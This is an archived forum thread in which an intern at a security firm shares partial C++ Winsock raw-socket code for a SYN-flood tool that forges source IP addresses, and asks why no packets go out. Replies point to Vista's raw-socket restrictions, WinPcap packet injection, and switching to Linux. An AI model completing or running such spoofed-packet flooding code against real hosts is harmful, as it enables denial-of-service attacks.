Jump to content
  • Advertisement
Sign in to follow this  

Raw Sockets

This topic is 4097 days old which is more than the 365 day threshold we allow for new replies. Please post a new topic.

If you intended to correct an error in the post then please contact us.

Recommended Posts

Hello all, Recently, I've started interning with a security firm (this is meant more to teach me than much else), my first project was to make a 'syn flooder' (A DNS attack)... So I did some research and came up with two options: A: Send out TCP packets with false IP addresses and a SYN flag set B: Modify the NIDS code (basically 'root kit level patching') I went with A, so therefore I need Raw Sockets. Some more research revealed that "Raw TCP packets can't contain data" Not a problem, I think, since all I need is a header with a SYN flag and a fake IP address. (Btw, I found that semi quote from a source on Wikipedia). So I test my app with Ethereal, but nothing is sent out- at all! And my error checking doesn't reveal anything... So, I am doing this in C++ W/ Visual Studio 2005 standard, winsock2, on Vista. I have access to a virtual machine too. Also, I make sure that I'm running/debugging with administrator permissions. *Disclaimer* I am not trying to hack anyone or anything, but merely to learn about security wise programming *Disclaimer* Here is some of my code, I think my error might be in my flag setting routine, I've only set the SYN flag.
namespace SynAttacker
	char packetData[512]; //Max size of packet is 512 bytes
	int payloadSize = 256; 
	IPV4_HDR* ipHdr=NULL; 
	TCP_HDR* tcpHdr=NULL;
	hostent* hostEntity=NULL; 
	unsigned short src_port;
	unsigned short dest_port;
	char* src_ip;
	char* dest_ip;

void SynAttacker::setUpAddresses( unsigned short src_port, unsigned short dest_port, char* src_ip, char* dest_ip )
	if( (hostEntity=gethostbyname(dest_ip))==0 )
		printf( "Host unresolved" );
	dest.sin_family = AF_INET;
	dest.sin_port = htons( dest_port );
	memcpy( &dest.sin_addr.s_addr, hostEntity->h_addr, hostEntity->h_length );
	SynAttacker::src_port = src_port;
	SynAttacker::src_ip = src_ip;
	SynAttacker::dest_port = dest_port;
	SynAttacker::dest_ip = dest_ip;

SOCKET SynAttacker::generateAndSendPacket( SOCKET s )
	A packet has TWO headers, first comes the IP portion, 
	then comes the TCP packet- since TCP is built 'on top of' 
	IP.  So I set up the IP data first, then I set up the TCP.

	ipHdr = (IPV4_HDR *)packetData;	//lets point to the ip header portion
	ipHdr->ip_version=4;		//The version of the IP that this packet is formed for
	ipHdr->ip_header_len=5;		//The length of the IP header, in 32 bit words (4 bytes)
	ipHdr->ip_tos    = 0;
	ipHdr->ip_total_length = htons ( sizeof(IPV4_HDR) + sizeof(TCP_HDR) );
	ipHdr->ip_id     = htons(2);
	ipHdr->ip_frag_offset = 0;
	ipHdr->ip_frag_offset1 = 0;
	ipHdr->ip_reserved_zero = 0;
	ipHdr->ip_dont_fragment = 1;
	ipHdr->ip_more_fragment = 0;
	ipHdr->ip_ttl    = 8;
	ipHdr->ip_protocol = IPPROTO_TCP;
	ipHdr->ip_srcaddr  = inet_addr(src_ip);
	ipHdr->ip_destaddr = inet_addr(inet_ntoa(dest.sin_addr));
	ipHdr->ip_checksum = 0;

	tcpHdr = (TCP_HDR *)&packetData[sizeof(IPV4_HDR)]; //get the pointer to the tcp header in the packet
	tcpHdr->source_port = htons(src_port);
	tcpHdr->dest_port = htons(dest_port);
	//FLAGS- Might this be the mistake?
	tcpHdr->checksum = 0;
	//Take the address where the packet's data starts.
	//void* dataPtr = &packetData[sizeof(IPV4_HDR) + sizeof(TCP_HDR)];
	//memset(dataPtr, '^', payloadSize);

	printf( "Bytes sent: %d", sendto( s, packetData, sizeof(IPV4_HDR)+sizeof(TCP_HDR) + payloadSize, 0, (SOCKADDR*)&dest, sizeof(dest) ) );
	return s;

Share this post

Link to post
Share on other sites
You don't show the bit of code that creates the socket.

Try out something like this example first:

If that doesn't work, my gut feeling would be that Vista has mucked things up. Make sure you're running the program as the real Administrator.

But for serious security analysis, I wouldn't rely on such operating system APIs. I believe WinPcap allows packet injection, somewhere in the NDIS IM level.

I think my error might be in my flag setting routine, I've only set the SYN flag.

No, that's perfectly valid. IIRC, the standard TCP handshake is SYN, SYN|ACK, ACK.

Share this post

Link to post
Share on other sites
Well, I've compared my code to multiple versions on the internet, and they appear to be the same---

bool SynAttacker::initializeAttack()

WSADATA wsaData;
WORD version;
int error;

version = MAKEWORD( 2, 0 );

error = WSAStartup( version, &wsaData );

/* check for error */
if ( error != 0 )
/* error occured */
return FALSE;

/* check for correct version */
if ( LOBYTE( wsaData.wVersion ) != 2 ||
HIBYTE( wsaData.wVersion ) != 0 )
/* incorrect WinSock version */
return FALSE;

return TRUE;

//Creates a socket
SOCKET SynAttacker::getSocket( )
//Create Raw TCP Packet
printf("\nCreating Raw TCP Socket...");
printf("Creation of raw socket failed.");
return 0;
printf("Raw TCP Socket Created successfully.");
int optval=1;
//Put Socket in RAW Mode.
printf("\nSetting the socket in RAW mode...");
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&optval, sizeof(optval))==SOCKET_ERROR)
printf("failed to set socket in raw mode.");
return 0;
return s;

Share this post

Link to post
Share on other sites
Yes, I run VS2005 in admin although I doubt that this transfers over to programs running under it's control, so I just compile and then navigate to the exe file w/ windows explorer and start it up with administrator rights.

Share this post

Link to post
Share on other sites
In Vista, there's a rather important difference between "administrator rights" and the actual Administrator account. Try running it as Administrator.

But then again...if that's the problem, I'd expect error codes.

Share this post

Link to post
Share on other sites
Hmmm... That seems interesting, but I have an empty partition (40gigs) on my hd so I was thinking of installing xp w/o any service packs-- do you think that would remove security restrictions?

Share this post

Link to post
Share on other sites
While it would remove security restrictions, it would also leave the (virtual) machine vulnerable to outside attack, as WinXP was really hole-y when released. A better approach might be to install a modern Linux falvor, which doesn't have the holes, and doesn't try to prevent you from sending raw TCP packets.

Share this post

Link to post
Share on other sites
Sign in to follow this  

  • Advertisement

Important Information

By using GameDev.net, you agree to our community Guidelines, Terms of Use, and Privacy Policy.

GameDev.net is your game development community. Create an account for your GameDev Portfolio and participate in the largest developer community in the games industry.

Sign me up!